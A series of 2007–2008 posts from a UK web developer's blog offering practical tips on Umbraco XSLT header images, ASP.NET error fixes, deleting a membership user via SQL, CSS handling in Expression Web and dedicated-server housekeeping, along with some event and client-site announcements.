There's still more refining to be done to it and there are a few errors but it's far better than the old site :)

Visit the new The Site Doctor website at www.thesitedoctor.co.uk -new customer quotes and portfolio items coming soon!

We've got some wicked new branding designs to share shortly but until it's all published it's all very hush hush I'm afraid ;)

Thursday, March 06, 2008 3:26:31 PM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [1]  | 
# Monday, February 11, 2008

Following on from a recent post of mine about how to set up changeable headers using the media picker in Umbraco, a new site I have been working on required something a little extra -they wanted the headers to simply be chosen at random from a given media folder.

First, create a new (blank) XSLT file and add the following:

Random header images XSLT

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xsl:Stylesheet [ <!ENTITY nbsp " "> ]>
<xsl:stylesheet 
    version="1.0" 
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform" 
    xmlns:msxml="urn:schemas-microsoft-com:xslt"
    xmlns:umbraco.library="urn:umbraco.library"
    xmlns:msxsl="urn:schemas-microsoft-com:xslt"
    xmlns:math="urn:schemas-hizi-nl:math"
    xmlns:Exslt.ExsltStrings="urn:Exslt.ExsltStrings"
    xmlns:Exslt.ExsltMath="urn:Exslt.ExsltMath"
    exclude-result-prefixes="msxml Exslt.ExsltMath Exslt.ExsltStrings math umbraco.library">

<xsl:output method="xml" omit-xml-declaration="yes"/>

<xsl:param name="currentPage"/>

<msxml:script language="JavaScript" implements-prefix="math">
function random(numDie,numMax,numMin){
if (numMin==null){numMin=1;}
var sum=0;
for (var index=0;index&lt;numDie;index++){ 
sum+=Math.floor(Math.random()*(numMax-numMin) + numMin);
}
return "" + sum;
}
function floorme(numFloor){
return "" + Math.floor(numFloor);
}
</msxml:script>

<xsl:variable name="StartNode" select="/macro/StartNode/node/@id" />
<xsl:variable name="parent" select="umbraco.library:GetMedia($StartNode, 'false')" /> 
<xsl:variable name="random" select="math:random(1, count($parent/node)+1, 1)"/>

<xsl:template match="/">

    <xsl:for-each select="$parent/node">
        <xsl:if test="position()=$random">
            <xsl:if test="./data [@alias = 'umbracoExtension'] = 'gif' or ./data [@alias = 'umbracoExtension'] = 'jpg' or ./data [@alias = 'umbracoExtension'] = 'jpeg' or ./data [@alias = 'umbracoExtension'] = 'png'">
                <style type="text/css">
                #header{
                    background-image: url(<xsl:value-of select="./data [@alias = 'umbracoFile']"/>);
                }
                </style>
            </xsl:if>
        </xsl:if>
    </xsl:for-each>
</xsl:template>

</xsl:stylesheet>

This uses the StartNode (a media folder) passed in from the macro to loop through any valid files (in this case jpg/gif/png) and pull out the image if it's valid. I was thinking about replacing the for-each loop and simply using the index, but I'm not sure there would be any performance improvement unless there were a lot of header images in the folder.
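For reference, a rough, untested sketch of that index-based variant (assuming the same $parent and $random variables as above, and checking just one extension for brevity):

```xml
<!-- Untested sketch: select the nth media node directly instead of looping -->
<xsl:variable name="pick" select="$parent/node[position() = $random]" />
<xsl:if test="$pick/data [@alias = 'umbracoExtension'] = 'jpg'">
    <style type="text/css">
    #header{
        background-image: url(<xsl:value-of select="$pick/data [@alias = 'umbracoFile']"/>);
    }
    </style>
</xsl:if>
```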

You'll then need to create a new macro and add a parameter with the name "StartNode" and select "mediaCurrent" as the Type. That's it :)

I'd like to build on this and have a "valid" headers selector which would use a Multiple Media picker and would allow for banner ads to be selected at random but that can wait for a client that needs it ;)
Monday, February 11, 2008 3:40:52 PM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [8]  | 
# Friday, January 18, 2008


For those of you Microsoft readers I thought I'd let you know I've just had an email come through about Visual Studio's UK Launch. It's happening on March 19th 2008 in Birmingham's ICC. Registration has finally opened and you can register here: http://go.microsoft.com/?linkid=8126604

Alternatively check out the live cast at: www.heroeshappenhere.co.uk.

Why am I excited about this? Well the last launch event I went to gave away free -and full- copies of Microsoft Visual Studio 2005 and SQL Server 2005 to every delegate! Hope to see you there -let me know if you can make it.

Friday, January 18, 2008 12:13:38 PM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [0]  | 
# Wednesday, January 16, 2008

After our recent issues with Fasthosts (or as they are now fondly referred to in the office - Farcehosts) I have made the conscious decision to move away from them completely over the forthcoming months (probably years). We no longer have any clients on their hosting platform but we still have circa 300 domain names registered through various accounts through their sister company UKReg.

Due to the authority's charges, we can't just transfer all these domains away as it'd cost us a fortune (and possibly one we can't recoup) so I'm going to do it as they expire. In our search to find an alternative provider someone suggested we check out the new kid on the block - Heart Internet. According to those in the know on Underscore they are a bunch of guys who used to work at 1&1 and decided they could do it better.

So far I've found their service to be great -and value wise they're cheaper than most providers which is a bonus. As with most of the providers these days it's all managed through their easy to use online control panel which is pretty straight forward. If you're on the lookout for great value or cheap domain names give Heart Internet a look.

BTW if you're wondering where Heart Internet's ".co.uk domain names from 9p" offer is, check under the transfer fees. Still, £2.59 is a great price for any .co.uk!

Wednesday, January 16, 2008 12:59:38 PM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [0]  | 
# Sunday, January 13, 2008

I'm sure I've blogged about this in the past -or perhaps it's just on my "to blog about" list -but I thought I would share this little ditty on a Sunday night.

If you ever need to delete a user from your ASP.Net Membership database this is a really useful SQL script to do just that (I often find that the ASP.Net web administration tool throws a SQL Exception while trying to delete a user).

To delete a user from the ASP.Net membership database, simply identify the Guid of the user, enter it where I've written 'THE GUID OF THE USER HERE' and hit go :) (note the script deletes from the child tables first so the foreign key constraints aren't violated).

USE ASPNet
GO

DECLARE @UserId uniqueidentifier
SET @UserId = 'THE GUID OF THE USER HERE'

DELETE FROM aspnet_Profile WHERE UserID = @UserId
DELETE FROM aspnet_UsersInRoles WHERE UserID = @UserId
DELETE FROM aspnet_PersonalizationPerUser WHERE UserID = @UserId
DELETE FROM dbo.aspnet_Membership WHERE UserID = @UserId
DELETE FROM aspnet_users WHERE UserID = @UserId

The message I was referring to above usually looks something like the following:

Msg 547, Level 16, State 0, Line 9
The DELETE statement conflicted with the REFERENCE constraint "FK__aspnet_Us__UserI__17036CC0". The conflict occurred in database "ASPNetMemberships", table "dbo.aspnet_UsersInRoles", column 'UserId'.
The statement has been terminated.

I've not looked into why it's happening (I expect it's something to do with an incorrect install on my part) but I'm sure there's a solution for it. I know there are a couple of built-in stored procedures, i.e. aspnet_Users_DeleteUser, but they required more params to get working ;)

Sunday, January 13, 2008 8:37:44 PM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [4]  | 
# Thursday, January 03, 2008

This made me smile: when surfing around at lunch I stumbled across www.heroeshappenhere.com -Microsoft's Visual Studio 2008 launch site. I got all giddy with excitement, downloaded the latest version of Silverlight and woohoo -a registration link! Finally!

Sadly though, you can only register for the LA event at the moment. Check the "Outside of the US" drop down though, it'll make you smile (or at least it did me) -notice anyone missing? (Other than France that is :P)

Thursday, January 03, 2008 2:38:19 PM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [2]  | 
# Tuesday, November 27, 2007

A project we're currently working on needs to have interchangeable header images. The theory is to set the header image on the parent page and then, unless one is specified for the page, it should use one of its ancestors'.

Umbraco has a nice control called a "Media Picker" which I felt was perfect for the job as it meant you could easily share header images across the site, and it also made sense from a user perspective to have a "Header Images" folder to choose from. The issue from my point of view was how to traverse up the tree until it found a header image to use. Imagine the following site map:

-Home
     -Products
          -Category
               -Product details (Custom header image)

If you’re on the products/category page it should display the header image from Home but when you’re on the product details page it needs to show the specified header image.

So how do you do it? It turns out it's (fairly) simple using XSLT. The first issue I ran into was getting the URL of the media file from the media picker control. Umbraco offers a useful function to do this for you (well, almost!). Using the function umbraco.library:GetMedia you are able to get the details of the file based on the media item id, but it includes everything, so you then need a little XSLT to select the attribute "umbracoFile":

umbraco.library:GetMedia([XSLT TO SELECT THE FIELD],'false')/data [@alias = 'umbracoFile']

That should give you something along the lines of “/imgs/somefolder/somefile.jpg”

Now how can you traverse up the tree to get the data? Thanks to Morten Bock and Casey Neehouse for helping me understand the XSLT; the following code should give you the URL of the nearest media item in the tree:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xsl:Stylesheet [ <!ENTITY nbsp " "> ]>
<xsl:stylesheet 
        version="1.0" 
        xmlns:xsl="http://www.w3.org/1999/XSL/Transform" 
        xmlns:msxml="urn:schemas-microsoft-com:xslt"
        xmlns:umbraco.library="urn:umbraco.library"
        exclude-result-prefixes="msxml umbraco.library">

<xsl:output method="xml" omit-xml-declaration="yes" />

<xsl:param name="currentPage"/>

<xsl:template match="/">
    <xsl:choose>
        <xsl:when test="$currentPage/ancestor-or-self::node [string(data[@alias='pageBanner'])!=''][1] /data[@alias='pageBanner'] != ''">
            <xsl:value-of select="umbraco.library:GetMedia($currentPage/ancestor-or-self::node [data[@alias='pageBanner']!=''][1] /data[@alias='pageBanner'],'false')/data [@alias = 'umbracoFile']"/>  
        </xsl:when>
        <xsl:otherwise>
            <!-- The URL of the default banner just in case the user removes the homepage banner (would be better as a parameter) -->
        </xsl:otherwise>
    </xsl:choose>
</xsl:template>

</xsl:stylesheet>

Then add a macro to your project and you're done :). You can see it in action on the new Lucy Switchgear website if you're interested; it's currently being built so it's bound to be a little rough around the edges, but do let me know what you think. Our remit was to improve the CMS they had in place, making it easier to manage the site, and also to sort out a few major issues from an SEO perspective. Although altering the design wasn't part of the initial brief, I think you'll agree the facelift we've given the site is for the better (even if it's just from a usability point of view).

Tuesday, November 27, 2007 6:26:51 PM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [8]  | 
# Monday, November 26, 2007

Having only recently started to use Umbraco, I've taken a couple of days to familiarise myself with the way it works and to get a few best practices in place. I expect these will be updated over time, but you've got to start somewhere ;)

As with any code, I think it's very important to follow a consistent naming convention -whether it's the same one everyone else follows or not, you need to be able to pickup code you wrote months/years/decades ago and still understand it. Your styles will no doubt change over the years but you get the idea.

I've chosen to follow the following "style":

  • Document Types: Lowercase the first letter of the alias followed by capitals for new words (i.e. camelCase). Use descriptive names i.e. Home Page for the document type as it'll be client facing. Suffix with "Page" if it is a page document type (as opposed to i.e. a screen shot)
  • Templates: If the template is specifically for a document type, use the same name for the template, if it relates to multiple document types name it logically i.e. "Master Template" or "Left Menu"
  • Macros: Prefix the macro alias with uppercase TSD to avoid conflicts with other macros. Prefix the name with [Source of the macro] i.e. [XSLT] or [User Control]. This is something I picked up from the sample package created by Warren Buckley that I think makes it easier to understand what's going on
  • XSLT Files: Prefix the name with the site's abbreviation i.e. for www.thesitedoctor.co.uk it would be TSD or for www.wineandhampergifts.co.uk WAHG if it's a site specific XSLT file otherwise name conventionally i.e. CamelCase
Monday, November 26, 2007 10:30:56 AM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [0]  | 
# Friday, November 23, 2007

I don't know if any of my readers are familiar with Fasthosts' recent security problems that hit the press a couple of weeks ago, but I couldn't help but laugh at a conversation I had with them the other day. Bearing in mind they had a breach in their security which meant that all passwords had to be reset, I was astonished to get this email about an FTP login issue.

Is it just me or is that a little nuts asking a user to send their username and password in clear text just after a major breach in security? I thought my response was very measured:

Friday, November 23, 2007 9:22:41 AM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [0]  | 
# Friday, September 21, 2007

It's been rather quiet on my blog recently, if you're wondering why (and don't chat to me on/off-line) I thought I would share with you what we've been working on recently.

For the past month or so The Site Doctor has been developing a new web site (www.wineandhampergifts.co.uk) for Porter and Woodman Gifts Ltd -a local company that produces personalised corporate hampers and gifts. It's been quite a challenge as they have a rather unusual ordering system that allows multiple items to be sent to multiple recipients/addresses. Looking at it now, it's not so complicated, but the delivery charge calculations and initial specs took a while to fully grasp. It's been really enjoyable.

I'll probably cover aspects of the site over the forthcoming months, but there are a few really nice features to the Wine and Hamper Gifts site (or at least I think so). Some of them the end user will never know about, such as the use of generics to calculate the address/recipient/gift variations; others they may, for instance the JavaScript1 Zoom function on the product details page (courtesy of LuckyZoom). Add the design created by our excellent designer Gareth Brown and it all adds up to what has to be one of the best sites I've developed to date.

1 Yes, I did just say I've integrated some JavaScript into the site ;)

I doubt most of my readers are interested in the ins and outs of the project itself, but from an SEO perspective I for one am expecting pretty decent results. We opted to use the URL Rewriting ISAPI from Helicon this time round over our usual IISMods URL Rewriting ISAPI, as for some reason the IISMods site has been offline for a while (and, checking now, has been converted into a very weird site).

Another aspect that some people may be unaware of is that the majority of the Wine and Hamper Gifts site operates the same without JavaScript as it does with it; this is important not only for screen readers but also for search engines. The only area of the site I'm aware of that doesn't operate without JavaScript is the "Personalise this gift" link on the cart page, which lets the user either edit the existing message or add one that doesn't already exist. That's because it uses a LinkButton, but I may find a way around that later.

Other features that I really like are little things like the way the drop down lists on the left hand menu are created: they're not actually drop down lists but unordered lists that are then manipulated using JavaScript. I think the JavaScript could do with a little tweaking but the result is superb. The site also creates a PDF receipt which is emailed to the user, something I've been meaning to look into for some time but hadn't had the chance. Luckily, while I was developing the site, Sean Ronan posted to the MsWebDev list about an ASP.Net PDF library, iTextSharp (a port of a Java library), which, despite a few oddities left over from the Java port, does exactly what I wanted. The library is pretty easy to use once you get your head around it and certainly produces some nice results.

There's still more work that's needed to finalise the content and various aspects of the Wine and Hamper Gifts website but if you have a chance, check out the new Porter and Woodman Gifts Ltd Wine and Hamper Gifts website and leave a comment here letting me know what you think :D

Oh, and they've given us a pretty high target to get before Christmas so if you're thinking about treating your customers to a personalised corporate hamper or gift give a little thought to using www.wineandhampergifts.co.uk

AJAX | ASP.Net | C# | CSS | Design | SEO | The Site Doctor | Web Development
Friday, September 21, 2007 11:20:01 PM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [0]  | 
# Friday, August 24, 2007

Server Error in '/' Application.


The Controls collection cannot be modified because the control contains code blocks (i.e. <% ... %>).
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.Web.HttpException: The Controls collection cannot be modified because the control contains code blocks (i.e. <% ... %>).

Source Error:

 

Line 132:                        metaKey.Name = "keywords";
Line 133:                        metaKey.Content = p.MetaKeywords;
Line 134:                        this.Page.Header.Controls.Add(metaKey);
Line 135:                    }
Line 136:                    if (!String.IsNullOrEmpty(p.MetaDescription))


Source File: a:\xyz\ContentHandler.aspx.cs    Line: 134

Stack Trace:

 

[HttpException (0x80004005): The Controls collection cannot be modified because the control contains code blocks (i.e. <% ... %>).]
   System.Web.UI.ControlCollection.Add(Control child) +2105903
   ContentHandler.Page_Load(Object sender, EventArgs e) in a:\xyz\ContentHandler.aspx.cs:134
   System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +15
   System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +34
   System.Web.UI.Control.OnLoad(EventArgs e) +99
   System.Web.UI.Control.LoadRecursive() +47
   System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +1061


Version Information: Microsoft .NET Framework Version:2.0.50727.832; ASP.NET Version:2.0.50727.832

Another day, another issue ;)

This had me going around in circles for a while until I realised what it was. If you're getting this error, you can bet your bottom dollar that you have <%= %> somewhere in your page's header -furthermore, I'd hazard a guess that you've got it in some JavaScript to reference an ASP.Net control on the page- and that you're then trying to add a control to the header programmatically (or a custom control from someone like Telerik is trying to). Am I right1?

1 I'm not allowed to ask you to so I won't, but if I was right, then spend that bottom dollar clicking on one of the Google Ads :P

I can't tell you exactly why this occurs, but my understanding is that ASP.Net can't re-create the header if it has a Response.Write (<%=) somewhere in it -most likely because the value isn't available at the point the header is created (I'll look into it). No doubt you want to know the fix?

The Fix
The fix is simple, remove the inline code blocks and JavaScript and move it to your code behind i.e.:

string _manageSearch = String.Format( @" 
        function ManageSearch(){{
                var lbl = document.getElementById(""lblFindAGift"");
                var txt = document.getElementById(""{0}"");
                var btn = document.getElementById(""{1}"");

                // ...do something with it...

        }}",

        txtSearch.ClientID,
        btnSearch.ClientID); // {1} needs a second argument -a button control's ClientID, assumed here

this.Page.ClientScript.RegisterClientScriptBlock(this.GetType(), "ManageSearch", _manageSearch, true);

Remember: you need to escape the curly brackets, otherwise String.Format will throw an "Exception of type System.Web.HttpUnhandledException was thrown" error

Update: Thanks to Julian Voelcker for sending me this alternative "fix" for the problem -can't say I like it though ;)- basically, instead of using <%= ... %> you would write the databinding expression <%# ... %>.

Friday, August 24, 2007 10:49:56 AM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [10]  | 
# Wednesday, August 22, 2007

Type
System.FormatException
Message
Exception of type 'System.Web.HttpUnhandledException' was thrown.
StackTrace
at System.Text.StringBuilder.FormatError()
at System.Text.StringBuilder.AppendFormat(IFormatProvider provider, String format, Object[] args)
at System.String.Format(IFormatProvider provider, String format, Object[] args)
Error Line
0

Just got that message (or perhaps just "Exception of type 'System.Web.HttpUnhandledException' was thrown")? Puzzled? I was the first time I got it. I've been meaning to post about it for quite some time now, so seeing as I got it again today I took the hint.

The error is horrifyingly obvious when you know about it. In short, you've no doubt got some code that looks like this:

String.Format("<html><head><style type=\"text/css\">body{color: #fff;}</style><body>...");

Can you spot it now? Notice your style declaration is using the curly brackets? Basically String.Format is interpreting that as a placeholder i.e. {0} and is throwing a wobbly.

The solution is simple too: just replace each opening/closing bracket with two, i.e.:

String.Format("<html><head><style type=\"text/css\">body{{color: #fff;}}</style><body>...");
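The same brace-doubling rule turns up in other formatting APIs too; Python's str.format, for example, uses identical {placeholder} syntax, so the pitfall and the fix are easy to reproduce outside .NET (a sketch for illustration, not part of the original post):

```python
# Python's str.format shares String.Format's placeholder syntax and
# its brace-doubling escape rule, so the same CSS snippet trips it up.
css_bad = "body{color: #fff;}"
try:
    # "{color: #fff;}" is parsed as a placeholder named "color",
    # much like String.Format throwing a FormatException
    css_bad.format()
    failed = False
except (KeyError, ValueError):
    failed = True
print("unescaped braces raise an error:", failed)

# Doubling the braces emits them literally
css_ok = "body{{color: #fff;}}".format()
print(css_ok)  # body{color: #fff;}
```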

I hope that helps someone out there :)

P.S. Watch out for methods that use String.Format as they may catch you out in the same way -i.e. Subject of System.Net.Mail.MailMessage

Wednesday, August 22, 2007 9:43:12 PM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [6]  | 
# Tuesday, August 14, 2007

What am I doing messing with OS Commerce, I hear you cry? Well, one of our SEO clients (Florame Organic Aromatherapy) uses a very hacked version of OS Commerce as its engine, and as dire as it is, if it ain't broke, don't fix it.

Today I came across (another) error with one of the modules that was installed -the dreaded "1062 - Duplicate entry" error. After a little digging it wasn't too hard to diagnose; unlike many people (see: 1062 - Duplicate entry fix), this error was being thrown on the product details page. It turns out that since installing the new Froogle feed, the UPC data wasn't being updated. The fix is either to remove it and create the UPC on the fly by combining, say, the product code and model number, or simply to validate that the new UPC code field is populated.

Easy :) -I hope I saved you trawling through the OS Commerce forums.

Tuesday, August 14, 2007 11:14:15 AM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [1]  | 
# Wednesday, August 08, 2007

As with my previous post, we upgraded the AJAX framework on the weekend which broke a few things, but one control in particular that broke was our TextChangedTextBox which is based on Pete Kellner's timed postback control. Since updating we were receiving a "'debug' is undefined" error on line 1409 (which was in one of the JavaScript include files).

Having had this issue before I updated the TextChangedBehavior.js but that didn't sort it, I have the latest version of the Futures on the server too so I was lost. Turns out I had an old version of the AJAX Futures DLL within the Bin folder of the project.

So as with my post on the ASP.Net forums before -make sure you update your AJAX Futures when updating your Microsoft AJAX framework!

Wednesday, August 08, 2007 6:20:47 AM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [0]  | 
# Wednesday, July 25, 2007

When we got our own dedicated server we needed to start working out a fair number of processes and decide upon a structure that was replicable, scaleable and manageable on a large scale, although the solution we've ended up adopting may not be the best, it certainly works for us.

One thing that has been bugging me however is the location and folder naming convention of the log files -for both the web hits and FTP hits. Typically, shared hosting solutions place the log files under the same folder as the one your website's root is situated but as we had no plans on giving our clients access to these logs this was an unnecessary task so we left them collecting in the default folder.

Leaving the log files in the default folder meant downloading them was very simple: all I needed to do was point our download script at the main folder and all would be included. The catch, however, was that the folders weren't named logically*; instead they seemed to include some form of ID assigned by IIS, i.e. W3SVC1.

*By this I mean human readable i.e. domainname.com

Until recently I've not worried about analysing the log files beyond one or two clients whom I could manage fairly easily but now with the inclusion of a host of other domains on the server I needed a way of quickly and easily identifying the folders and which domains they related to.

Historically, when I needed to know which domain a log folder related to, I would log onto the server, open IIS, open the properties of the domain, click on the log file properties and below the folder directory would be the folder name. That's fine if it's only a handful of domains, but what about when it's, say, 20? That's 2 minutes each (with cross-referencing etc.), so that's 40 minutes. I needed an automated system!

As it turns out, Microsoft have been kind enough to provide us with an interface we can easily code against in .Net so after a little Google-ing I wrote a number of little helper applications.

This little console application simply loops through all the domain names on the server it's being run on (the default instance of IIS) and outputs the relevant log file and folder path into a handy text file. I'll post in another post about how I use this file.
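I haven't got the tool's source to hand here, but the core idea can be sketched like this (Python used purely for illustration; the site ids and host names below are hypothetical -the real console application enumerates the sites on the default IIS instance rather than hard-coding them):

```python
# Map IIS's opaque log folder names (W3SVC<site id>) back to the
# domains they belong to, and emit the lines that would go into the
# mapping text file. The site list here is hard-coded for illustration.
def log_folder_map(sites):
    """sites: dict of IIS site id -> domain name; returns report lines."""
    return ["W3SVC%d -> %s" % (site_id, host)
            for site_id, host in sorted(sites.items())]

sites = {1: "domain.com", 2: "domain2.com"}  # hypothetical values
for line in log_folder_map(sites):
    print(line)
```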

For convenience's sake I have this run on a nightly basis and the text file output to the root of the log file directory, that way when I download the logs during the next day I get the latest update of log file locations and domain names :)

Download the IIS WWW and FTP log file location exporter.

1 Year Update: I've posted the source for the IIS WWW and FTP log file location exporter here.

Wednesday, July 25, 2007 4:18:42 PM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [2]  | 
# Thursday, July 19, 2007

After a number of months of hearing how great Microsoft's latest web development environment is -Microsoft Expression Web- I thought I would install it in place of Dreamweaver on my new laptop. I was -until today- pretty impressed with some of its features and how well it handles CSS within the IDE, and had no reason to complain.

That was until today. As I write this, I'm sitting in our apartment in Croatia with the sun beating down on me, generally enjoying life. As it's incredibly hot outside around noon, I thought it would be a good idea to crack on with some work on the new The Site Doctor design -which I hope to have online shortly after I return. So I load up Microsoft Expression Web and the various pages of the new site and crack on.

I'd already sorted the CSS for the site, so there was no need to open any of the files or make alterations to them; however, I like to have them open so I can check class names and ids as I work. When I switched over at one point, I noticed that my nice, neat and tidy CSS file of around 190 lines was suddenly closer to 300. I couldn't work it out until I noticed that Microsoft Expression Web had separated out all my group declarations into individual declarations, i.e.:

a, a:link, a:visited, a:active{
text-decoration: none;
}

Became:

a:active{
text-decoration: none;
}
a:visited{
text-decoration: none;
}
a:link{
text-decoration: none;
}
a{
text-decoration: none;
}

Well done Microsoft, I thought you would have learnt your lesson after the fiasco that was Visual Studio 2003's HTML editing, what on earth were you thinking? I'm sure this is a simple setting I need to change (and I can understand why they've done it) but not having Internet access here there's no easy way of finding out (I've searched the help files) which means hours of careful CSS architecture have been completely trashed.

So, as soon as I realised, I spent about 20 minutes meticulously working through the bunch of CSS files open reversing the mess Microsoft had made of them and promptly closed them, safe in the knowledge Microsoft Expression Web can't mess with them again. Or so I thought.

A short while ago I needed to open one of the CSS files again to alter a few declarations and, to my horror, I found that the declarations had been ungrouped. I can't believe it: not content with simply altering the CSS files that are open, Microsoft Expression Web actually alters the CSS files on the file system without you knowing.

If you're ever thinking about using Microsoft Expression Web for CSS development, don't expect your files to stay neat and tidy. In my case I would say the files increased in size by almost 5x, which OK may only be 1Kb --> 5Kb, but if you're getting tens of thousands of hits a day that's a serious bandwidth increase.

Not a happy bunny.

Thursday, July 19, 2007 11:02:32 PM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [6]  | 
# Monday, June 18, 2007

Since getting our own dedicated server a couple of years ago we’ve had a fairly steep learning curve which a lot of the time has been a tad hit-and-miss (never to the detriment of our customers, I might add). Luckily we’ve had the superb support of Rackspace behind us, but as others may not be so lucky, I thought I would post up a few nuggets we’ve received over the years. As I remember more, I’ll add additional posts.

Domain/Folder organisation

One of the first issues we came across (and I’m sure many people have already got into this position) was the structure of the folders on both the server and development machines. The solution we came up with was to have a common folder –for argument’s sake let’s call it “WebsitesFolder”. Within “WebsitesFolder” you then create a new directory for each domain name and finally, within that, a folder for each subdomain, i.e. www, blogs etc.

By creating a new folder for each subdomain, you are able to quickly find the correct folder for the domain. Then locally you are able to store the source files outside of the site’s root which will (or should) speed up your FTP transfer process as you won’t need to select which files to upload1. The structures might then look like this:
Development server

  • /domain.com
    • /www/
    • /subdomain/
    • /Source Imagery/
    • /Some Irrelevant Folder/
  • /domain2.com
    • /www/

Production server

  • /domain.com
    • /www/
    • /subdomain/
  • /domain2.com
    • /www/

1It might also be worth you checking out SyncBackSE which is an excellent FTP client that only uploads files you have changed since the last transfer. It also has the added advantage that it has customisable filters allowing you to ignore source files and folders as _notes, .cs, .vb etc. http://www.2brightsparks.com/syncback/sbse.html

Finding large directories

The other day I noticed that disk space on one of our servers was running a little low, but as far as I was aware there was plenty of space left. As we tend to store all client data within set folders, I was able to quickly identify that it wasn’t the client folders that were taking all the room –so what was?

When you don’t know which folders are taking the space, there are a couple of tools you may find useful. The first I was told about was TreeSize (http://www.jam-software.com/freeware/index.shtml) -a free program that gives you a graphical representation of each folder’s usage:

It then allows you to quickly traverse the directory structure and identify the offending directory. There’s a load more information available through the easy-to-use interface but if all you want is a number it’s a little overkill.

The alternative to TreeSize

A heading? Just for this? Yes –this little tool is the Mac Daddy of directory size info as far as I’m concerned as it’s a free (we like free ;)) command line tool found on Microsoft’s site called “Directory Disk Usage” –DIRUSE.

DIRUSE is really easy to use, simply load up CMD and type in:
diruse /m /* c:\
and you’ll get a report of your chosen folder’s sub folders, their related sizes and a count of the files within them. OK, its iteration can be a little slow, but it gives you all the information you need quickly and easily.

The syntax is as follows:
DIRUSE [/S | /V] [/M | /K | /B] [/C] [/,] [/Q:# [/L] [/A] [/D] [/O]] [/*] DIRS

/S
Specifies whether subdirectories are included in the output.
/V
Output progress reports while scanning subdirectories.  Ignored if /S is specified.
/M
Displays disk usage in megabytes.
/K
Displays disk usage in kilobytes.
/B
Displays disk usage in bytes (default).
/C
Use Compressed size instead of apparent size.
/,
Use thousand separator when displaying sizes.
/L
Output overflows to logfile .\DIRUSE.LOG.
/*
Uses the top-level directories residing in the specified DIRS
/Q:#
Mark directories that exceed the specified size (#) with a "!".
(If /M or /K is not specified, then bytes is assumed.)
/A
Specifies that an alert is generated if specified sizes are exceeded. (The Alerter service must be running.)
/D
Displays only directories that exceed specified sizes.
/O
Specifies that subdirectories are not checked for specified size overflow.
DIRS
Specifies a list of the paths to check –you can use semicolons, commas, or spaces to separate multiple directories if required.

Note: Parameters can be typed in any order. And the '-' symbol can be used in place of the '/' symbol.

Also, if /Q is specified, the return code is ONE if any directories are found that exceed the specified sizes; otherwise the return code is ZERO.

Example: diruse /s /m /q:1.5 /l /* c:\websitesfolder

Monday, June 18, 2007 10:24:35 AM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [0]  | 
# Thursday, June 14, 2007

I’ve been meaning to post about the use of AccessKeys on websites now for some time (I wrote the post but never completed the list at the end). Then, this morning I saw a post from Tony Crockford on the WAUK list along similar lines so thought it was time I got the post online :)


Just before Christmas, we were looking for a new house so I was spending an increased amount of time on Rightmove and it really started to bug me. I’m really pleased by the fact that they tried to make their site simpler to navigate by introducing AccessKeys to their pages but in my view they’re defeating the purpose of them by overriding browser shortcuts. In this case, the one I’m referring to is the use of Ctrl+K which I use a lot to access Firefox’s search bar.

Why oh why have they chosen to override this key combination? In IE it’s not too irritating as it doesn’t activate the link; in Firefox, however, it automatically loads the link, so I’m forever being sent back to the buying homepage.

I can understand that they want to make the key relevant, but what does “K” have to do with buying? I could understand if they were overriding “B” –and it wouldn’t bother me as it’s related– but K? I realise that it’s impractical to avoid all shortcuts in all browsers, but I would have thought they’d look into the main shortcuts first.


I had planned to compile a list of common shortcuts but I’ve not had time yet –another thing on the list ;). What’s interesting however is that since I wrote this post in January, they’ve replaced a couple of the shortcuts already –Buying is now “B”.

So what’s Tony Crockford got to do with this all? Well he referred the list to the WCAG Samurai’s point on AccessKeys which I think is a valid one:

So there you have it, just don’t ;) -I think that now there are so many different browsers out there it’s impossible to account for them all so it’s probably the best methodology.

Thursday, June 14, 2007 8:02:59 AM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [0]  | 
# Friday, June 08, 2007

This has to be my laziest post yet -it's just a paste of the press release- but I'm too excited at the thought of free beer to re-write it ;) Hope to see you there; shout if you're going.


Chinwag Joins Forces With Top Software And Media Brands For Supersized Digital Networking Party

The UK digital media industry is gearing up for a soiree of grand proportions in July at Chinwag's Big Summer 07 networking party (http://bigsummer07.chinwag.com).

Giving the bash an extra boost - and supporting the inventive and fun entertainment programme, plus the lavish refreshments on site - are Chinwag's three party partners: Adobe (http://www.adobe.com/), Channel 4 (http://www.channel4.com/), and Purple (http://www.purple-consultancy.com/).

The free event, to be held at the historic Imperial College Union in Kensington, London, will be the largest-scale bash of its kind for people working in the digital sector, with the party encompassing 5 large rooms and the enclosed quadrangle, allowing a total capacity of 2,000 revellers at any one point in time.

Hosted by new media community Chinwag, it will bring together professionals in web, mobile and other interactive media to make useful connections, celebrate the return of the new media sector as a sustainable growth industry, and mingle in style in the sunshine of a London summer's evening.

Dominic Eames, editor, Online, at Channel 4 New Media said: "Channel 4 is always open to new ideas from the New Media community and is delighted to support Chinwag in this event."

Toby Thwaites, managing director of Purple said: "Having worked with the team at Chinwag for a number of years, I am delighted that Purple are able to support what will undoubtedly be the Digital event of the Summer."

